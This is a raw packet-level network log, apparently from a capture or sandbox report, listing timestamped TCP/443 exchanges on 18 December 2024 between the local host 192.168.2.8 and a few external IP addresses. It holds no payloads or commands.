                                                                                                                                                                          Dec 18, 2024 13:06:04.122103930 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.122123003 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.173872948 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.173906088 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.220664978 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.253993988 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254007101 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254035950 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254050970 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254096031 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254132032 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.254174948 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.254193068 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.259738922 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.259777069 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.259808064 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.259857893 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.259906054 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.259927034 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.265678883 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.265705109 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.265746117 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.265773058 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.265789032 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.273149967 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.273178101 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.273225069 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.273245096 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.273257017 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.293824911 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.293872118 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.293915987 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.293929100 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.293962002 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.305535078 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.305574894 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.305648088 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.305659056 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.305672884 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.310902119 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.310939074 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.311021090 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.311029911 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.361320972 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.361336946 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.408031940 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.442720890 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.045979977 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.046504021 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.046523094 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.046581984 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.046597004 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.046653032 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.065279961 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.065289974 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.065385103 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.065433025 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.065481901 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.076354027 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.076363087 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.076445103 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.076466084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.076531887 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.082158089 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.082185030 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.082268000 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.082285881 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.082318068 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.082338095 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.212949991 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.212995052 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.213085890 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.213125944 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.213170052 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.216892004 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.218198061 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.218236923 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.218291998 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.218307018 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.218334913 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.218355894 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.224106073 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.224137068 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.224256039 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.224287987 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.224339962 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.229780912 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.229804039 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.229974985 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.229986906 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.230062008 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.237581015 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.237621069 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.237724066 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.237740993 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.237766981 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.237781048 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.256953001 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.256977081 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.257164955 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.257189989 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.257235050 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.268887997 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.268917084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.268992901 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.269026041 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.269069910 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.274060011 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.274108887 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.274188995 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.274224043 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.274269104 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.404786110 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.404813051 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.404913902 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.404958010 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.405010939 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.410487890 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.410504103 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.410573959 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.410603046 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.410648108 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.416950941 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.416966915 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.417140961 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.417150021 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.417192936 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.421607971 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.421621084 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.421706915 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.421751022 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.421813965 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.429610014 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.429625988 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.429675102 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.429704905 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.429718971 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.429745913 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.449744940 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.449762106 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.449843884 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.449872017 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.449913979 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.460772038 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.460791111 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.460870981 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.460877895 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.460906029 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.460917950 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.466700077 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.466716051 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.466770887 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.466777086 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.466814995 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.597074986 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.597106934 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.597220898 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.597275972 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.597332954 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.597333908 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.602840900 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.602875948 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.602981091 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:05.603020906 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.603142023 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:12.241571903 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.269349098 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269367933 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269393921 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269422054 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.269435883 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269462109 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.269467115 CET4434971252.95.160.78192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:12.269493103 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.269519091 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:12.270200014 CET49712443192.168.2.852.95.160.78
                                                                                                                                                                          Dec 18, 2024 13:06:19.461693048 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:19.461754084 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:19.461951017 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:19.462272882 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:19.462294102 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:21.278562069 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:21.290273905 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:21.290313005 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.033953905 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.080017090 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.082588911 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082604885 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082623959 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082632065 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082655907 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082665920 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.082674980 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.082684994 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.082712889 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.090770960 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.142478943 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.261666059 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261679888 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261713028 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261745930 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261754036 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261826038 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.261846066 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.261861086 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.311108112 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.311134100 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.311292887 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.311320066 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.316396952 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.316473961 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.316483974 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.361202002 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.436165094 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436182976 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436218977 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436234951 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436256886 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436275959 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.436289072 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.436331987 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.462035894 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462054968 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462099075 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462127924 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462176085 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.462184906 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.462229013 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.465560913 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.465687990 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.487584114 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.487607002 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.487720966 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.487739086 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.487776995 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.491070986 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.513221025 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.513240099 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.513339043 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.513353109 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.564353943 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.564379930 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.611236095 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.622629881 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622649908 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622672081 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622680902 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622741938 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.622752905 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.622796059 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.625031948 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642748117 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642759085 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642776966 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642786026 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642843962 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.642855883 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.642894983 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.659446001 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659460068 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659490108 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659517050 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659535885 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.659537077 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659552097 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.659595013 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.659624100 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.676153898 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.676177025 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.676215887 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.676249981 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.676258087 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.676285982 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.692857027 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.692887068 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.692948103 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.692958117 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.693005085 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.693079948 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.693115950 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.709830999 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.709856033 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.709896088 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.252580881 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.252686024 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.252835989 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.253844976 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.498282909 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:23.498308897 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.498372078 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:23.498646021 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:23.498661995 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:25.372934103 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:25.375284910 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:25.375372887 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.185246944 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.236239910 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.238581896 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238591909 CET443497193.5.237.170192.168.2.8
